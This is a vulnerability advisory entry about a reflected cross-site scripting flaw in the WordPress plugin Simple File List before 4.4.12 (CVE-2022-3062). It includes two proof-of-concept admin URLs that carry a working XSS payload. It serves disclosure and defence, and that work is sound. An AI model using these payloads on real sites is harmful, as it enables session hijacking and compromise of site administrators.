Lucene search
Raad Haddad of Cloudyrion GmbHWPVDB-ID:2E829BBE-1843-496D-A852-4150FA6D1F7AHistoryAug 30, 2022 - 12:00 a.m.
Simple File List < 4.4.12 - Reflected Cross-Site Scripting
2022-08-3000:00:00
Raad Haddad of Cloudyrion GmbH
wpscan.com
4
0.001 Low
EPSS
Percentile
43.6%
The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
PoC
https://example.com/wp-admin/admin.php?page=ee-simple-file-list&tab;="style=animation-name:rotation+onanimationstart=alert(/XSS/)// https://example.com/wp-admin/?page=ee-simple-file-list&tab;=settings&subtab;="style=animation-name:rotation+onanimationstart=alert(/XSS/)//
| CPE | Name | Operator | Version |
|---|---|---|---|
| simple-file-list | lt | 4.4.12 |
Related
cve
cve
CVE-2022-3062
2022-09-26 13:15:10
nuclei
nuclei
Simple File List < 4.4.12 - Cross Site Scripting
2023-04-21 08:56:01
wpexploit
wpexploit
Simple File List < 4.4.12 - Reflected Cross-Site Scripting
2022-08-30 00:00:00
cvelist
cvelist
CVE-2022-3062 Simple File List < 4.4.12 - Reflected Cross-Site Scripting
2022-09-26 12:35:39
cnvd
cnvd
WordPress Simple File List Cross-Site Scripting Vulnerability
2022-09-28 00:00:00
prion
prion
Cross site scripting
2022-09-26 13:15:00
nvd
nvd
CVE-2022-3062
2022-09-26 13:15:10
fedora
fedora
[SECURITY] Fedora 35 Update: fzf-0.29.0-2.fc35
2022-08-17 01:36:21